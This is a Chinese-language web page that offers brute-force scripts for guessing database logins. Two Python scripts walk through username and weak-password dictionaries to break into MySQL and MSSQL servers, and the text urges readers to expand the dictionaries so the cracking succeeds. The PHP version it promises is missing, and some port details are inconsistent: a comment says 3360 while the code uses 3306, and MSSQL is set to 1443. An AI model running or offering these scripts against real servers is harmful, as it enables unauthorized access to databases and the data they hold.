释放双眼,带上耳机,听听看~!
数据库账号密码猜解脚本PHP版+Python版一、MysqlPHP版本爆破小脚本(注意:从代码可以看出用户名是个变量,一般数据库账号不会变,所以用户名没用数组作为字典。密码是用数组作为字典。字典可根据规矩扩展,破解的成功与失败,就看你扩展的字典强大不强大了。用法:保存代码为MysqlDatabas
数据库账号密码猜解脚本PHP版+Python版
一、Mysql PHP版本爆破小脚本(注意:从代码可以看出用户名是个变量,一般数据库账号不会变,所以用户名没用数组作为字典。密码是用数组作为字典。字典可根据规矩扩展,破解的成功与失败,就看你扩展的字典强大不强大了。用法:保存代码为MysqlDatabaseBlasting.php,浏览器打开就可使用。)
/* * author:Bearcat 2016-10-16 */
演示:
二、Mysql Python版本爆破小脚本,需要安装Python插件MySQL-python.exe,可以看出代码量很少,(注意:里用户名和密码都是类似字典。用法:保存代码为MysqlDatabaseBlasting.py,cmd切换到MysqlDatabaseBlasting.py路径下,并执行MysqlDatabaseBlasting.py即可开始破解)
/*
* author:Bearcat 2016-10-16
*/import MySQLdb
#coding=gbk
#目标IP mysql数据库必须开启3360远程登陆端口
mysql_username = ('root','test', 'admin', 'user')#账号字典
common_weak_password = ('','123456','test','root','admin','user')#密码字典
success = False
host = "127.0.0.1"#数据库IP地址
port = 3306
for username in mysql_username:
for password in common_weak_password:
try:
db = MySQLdb.connect(host, username, password)
success = True
if success:
print username, password
except Exception, e:
pass
演示:
三、Mssql Python版本爆破小脚本,需要安装MSSQL-python.exe可以看出代码量很少,参考二的用法
/*
* author:Bearcat 2016-10-16
*/import pymssql
common_weak_password = ('','123456','test','root','admin','user')#密码字典
mssql_username = ('sa', 'test', 'admin', 'mssql')#账号字典
success = False
host = "127.0.0.1"#数据库IP地址
port = 1443
for username in mssql_username:
for password in common_weak_password:
try:
db = pymssql.connect(server=host, port=port, user=username, password=password)
success = True
if success:
print username, password
except Exception, e:
pass
